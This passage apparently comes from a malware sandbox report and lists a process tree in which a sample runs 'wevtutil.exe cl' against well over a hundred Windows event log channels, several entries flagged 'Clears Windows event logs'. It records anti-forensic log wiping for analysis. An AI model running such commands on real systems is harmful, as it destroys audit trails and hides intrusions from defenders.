C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
3⤵
PID:4504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
3⤵
PID:444

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LimitsManagement/Diagnostic"
3⤵
PID:5024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Diagnostic"
3⤵
PID:3968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LinkLayerDiscoveryProtocol/Operational"
3⤵
PID:2820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LiveId/Analytic"
3⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LiveId/Operational"
3⤵
PID:4228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPEG2-Video-Encoder-MFT_Analytic"
3⤵
PID:3096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
3⤵
PID:4512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
3⤵
PID:4448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
3⤵
- Clears Windows event logs
PID:4772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSFTEDIT/Diagnostic"
3⤵
PID:4768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
3⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
3⤵
PID:2380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
3⤵
PID:1376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
3⤵
PID:1440

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
3⤵
PID:4428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
3⤵
PID:4144

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
3⤵
PID:4680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMC"
3⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Media-Streaming/DMR"
3⤵
PID:4916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Media-Streaming/MDE"
3⤵
PID:376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFCaptureEngine/MFCaptureEngine"
3⤵
PID:2376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
3⤵
PID:4460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
3⤵
PID:3384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
3⤵
PID:3040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-Performance/SARStreamResource"
3⤵
PID:2772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
3⤵
PID:4780

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
3⤵
PID:4088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Minstore/Analytic"
3⤵
PID:3008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Minstore/Debug"
3⤵
- Clears Windows event logs
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api-Internal/Analytic"
3⤵
PID:1436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Api/Analytic"
3⤵
PID:816

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Analytic"
3⤵
PID:4328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-Parser-Task/Operational"
3⤵
PID:4860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mobile-Broadband-Experience-SmsApi/Analytic"
3⤵
PID:1812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
3⤵
PID:5104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Admin"
3⤵
PID:4248

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Autopilot"
3⤵
PID:4600

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/Debug"
3⤵
PID:1060

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ModernDeployment-Diagnostics-Provider/ManagementService"
3⤵
PID:4792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Mprddm/Operational"
3⤵
PID:3052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
3⤵
PID:3432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
3⤵
PID:1000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
3⤵
PID:4100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
3⤵
PID:2732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
3⤵
PID:1904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
3⤵
PID:4348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
3⤵
PID:744

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
3⤵
- Clears Windows event logs
PID:960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
3⤵
PID:3692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ncasvc/Operational"
3⤵
PID:4128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Diagnostic"
3⤵
PID:4552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NcdAutoSetup/Operational"
3⤵
- Clears Windows event logs
PID:4288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NdisImPlatform/Operational"
3⤵
PID:1316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ndu/Diagnostic"
3⤵
PID:2688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
3⤵
PID:4292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-Connection-Broker"
3⤵
PID:3892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-DataUsage/Analytic"
3⤵
- Clears Windows event logs
PID:3896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-Setup/Diagnostic"
3⤵
PID:4432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
3⤵
PID:3712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkBridge/Diagnostic"
3⤵
PID:4832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
3⤵
PID:2308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
3⤵
PID:1912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
3⤵
PID:732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProvider/Operational"
3⤵
PID:2024

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Analytic"
3⤵
PID:4392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProvisioning/Operational"
3⤵
PID:264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkSecurity/Debug"
3⤵
PID:2608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkStatus/Analytic"
3⤵
PID:284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
3⤵
PID:272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-RealTimeCommunication/Tracing"
3⤵
PID:528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
3⤵
PID:260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
3⤵
PID:3448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ntfs/Operational"
3⤵
PID:3272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ntfs/Performance"
3⤵
PID:1656

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ntfs/WHC"
3⤵
PID:364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLE/Clipboard-Performance"
3⤵
PID:3668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
3⤵
PID:1340

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
3⤵
PID:2252

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-FirstLogonAnim/Diagnostic"
3⤵
PID:2324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-Core/Diagnostic"
3⤵
- Clears Windows event logs
PID:3748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Diagnostic"
3⤵
PID:4220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-DUI/Operational"
3⤵
PID:2568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine-Plugins-Wireless/Diagnostic"
3⤵
PID:1868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OcpUpdateAgent/Operational"
3⤵
PID:3436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
3⤵
PID:3456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
3⤵
PID:2664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
3⤵
PID:2256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneBackup/Debug"
3⤵
PID:2288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
3⤵
PID:3664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneX/Operational"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
3⤵
- Clears Windows event logs
PID:4776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OtpCredentialProvider/Operational"
3⤵
PID:620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
3⤵
PID:4204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Analytic"
3⤵
- Clears Windows event logs
PID:3936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Debug"
3⤵
PID:508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PackageStateRoaming/Operational"
3⤵
PID:4464

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
3⤵
PID:4828

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Partition/Analytic"
3⤵
PID:3108

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Partition/Diagnostic"
3⤵
PID:4228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
3⤵
PID:3096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PerceptionRuntime/Operational"
3⤵
- Clears Windows event logs
PID:4512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PerceptionSensorDataService/Operational"
3⤵
PID:3904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Analytic"
3⤵
PID:2344

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Diagnostic"
3⤵
PID:4876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-Nvdimm/Operational"
3⤵
PID:4888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Analytic"
3⤵
PID:1420

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Diagnostic"
3⤵
PID:1128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-PmemDisk/Operational"
3⤵
PID:4532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Analytic"
3⤵
PID:4836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Certification"
3⤵
PID:936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Diagnose"
3⤵
PID:956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PersistentMemory-ScmBus/Operational"
3⤵
PID:4652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PhotoAcq/Analytic"
3⤵
PID:4984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PlayToManager/Analytic"
3⤵
PID:2152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Policy/Analytic"
3⤵
PID:5036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Policy/Operational"
3⤵
PID:3056

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"
3⤵
- Clears Windows event logs
PID:4184

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"
3⤵
PID:4256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Power-Meter-Polling/Diagnostic"
3⤵
PID:1876

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"
3⤵
PID:4376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"
3⤵
PID:4864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"
3⤵
PID:4508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"
3⤵
- Clears Windows event logs
PID:3636

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"
3⤵
PID:524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"
3⤵
PID:456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Admin"
3⤵
PID:1496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"
3⤵
- Clears Windows event logs
PID:4056

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Debug"
3⤵
PID:4860

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"
3⤵
PID:1812

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"
3⤵
PID:1596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintBRM/Admin"
3⤵
PID:8

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService-USBMon/Debug"
3⤵
PID:5100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"
3⤵
PID:4484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"
3⤵
PID:1172

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"
3⤵
PID:2316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Privacy-Auditing/Operational"
3⤵
PID:3532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ProcessStateManager/Diagnostic"
3⤵
PID:536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Analytic"
3⤵
PID:1104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/CompatAfterUpgrade"
3⤵
PID:4956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin"
3⤵
PID:4848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/AutoPilot"
3⤵
PID:2408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Debug"
3⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/ManagementService"
3⤵
PID:844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Diagnostic"
3⤵
PID:3216

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Informational"
3⤵
PID:4128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Performance"
3⤵
PID:4552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-Developer/Debug"
3⤵
PID:4288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-InProc/Debug"
3⤵
PID:1316

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Admin"
3⤵
PID:2688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Debug"
3⤵
PID:4292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Operational"
3⤵
PID:3892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
3⤵
PID:3896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-qWAVE/Debug"
3⤵
PID:4432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC-Proxy/Debug"
3⤵
PID:3712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
3⤵
PID:4832

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/EEInfo"
3⤵
PID:2308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RRAS/Debug"
3⤵
PID:1912

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RRAS/Operational"
3⤵
PID:732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RadioManager/Analytic"
3⤵
PID:3552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic"
3⤵
PID:4700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RasAgileVpn/Debug"
3⤵
PID:2948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RasAgileVpn/Operational"
3⤵
PID:2880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReFS/Operational"
3⤵
PID:292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Analytic"
3⤵
PID:268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
3⤵
PID:3396

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Analytic"
3⤵
PID:4140

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoostDriver/Operational"
3⤵
PID:3164

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Regsvr32/Operational"
3⤵
PID:1412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
3⤵
PID:4412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Operational"
3⤵
PID:4408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
3⤵
PID:3064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
3⤵
PID:2272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
3⤵
PID:4260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
3⤵
PID:5064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug"
3⤵
PID:3112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
3⤵
PID:4488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin"
3⤵
PID:2568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-Kernel-Mode-Transport/Debug"
3⤵
PID:1868

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-User-Mode-Transport/Debug"
3⤵
PID:3436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
3⤵
PID:3456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Remotefs-Rdbss/Diagnostic"
3⤵
PID:1844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Remotefs-Rdbss/Operational"
3⤵
PID:2664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ResetEng-Trace/Diagnostic"
3⤵
PID:2256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
3⤵
PID:2288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
3⤵
PID:3664

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
3⤵
PID:1552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
3⤵
PID:4944

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RetailDemo/Admin"
3⤵
PID:3200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RetailDemo/Operational"
3⤵
PID:4764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Graphics/Analytic"
3⤵
PID:3936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing"
3⤵
PID:508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Networking/Tracing"
3⤵
PID:4464

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Web-Http/Tracing"
3⤵
PID:1908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-WebAPI/Tracing"
3⤵
PID:5092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTAdaptiveMediaSource"
3⤵
PID:1304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTCaptureEngine"
3⤵
PID:1684

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTMediaStreamSource"
3⤵
PID:3560

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTTranscode"
3⤵
PID:3752

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime/CreateInstance"
3⤵
PID:4092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime/Error"
3⤵
PID:3848

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBClient/Analytic"
3⤵
PID:5096

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBClient/HelperClassDiagnostic"
3⤵
PID:1160

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBClient/ObjectStateDiagnostic"
3⤵
PID:1440

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBClient/Operational"
3⤵
PID:4428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBDirect/Admin"
3⤵
PID:4144

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBDirect/Debug"
3⤵
PID:4680

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBDirect/Netmon"
3⤵
PID:688

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Analytic"
3⤵
PID:4916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Audit"
3⤵
PID:376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Connectivity"
3⤵
PID:2376

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Diagnostic"
3⤵
PID:4460

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Operational"
3⤵
PID:3384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Performance"
3⤵
PID:3040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Security"
3⤵
PID:3740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBWitnessClient/Admin"
3⤵
PID:3548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBWitnessClient/Informational"
3⤵
PID:2492

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SPB-ClassExtension/Analytic"
3⤵
PID:1460

C:\Windows\system32\wevtutil.exe
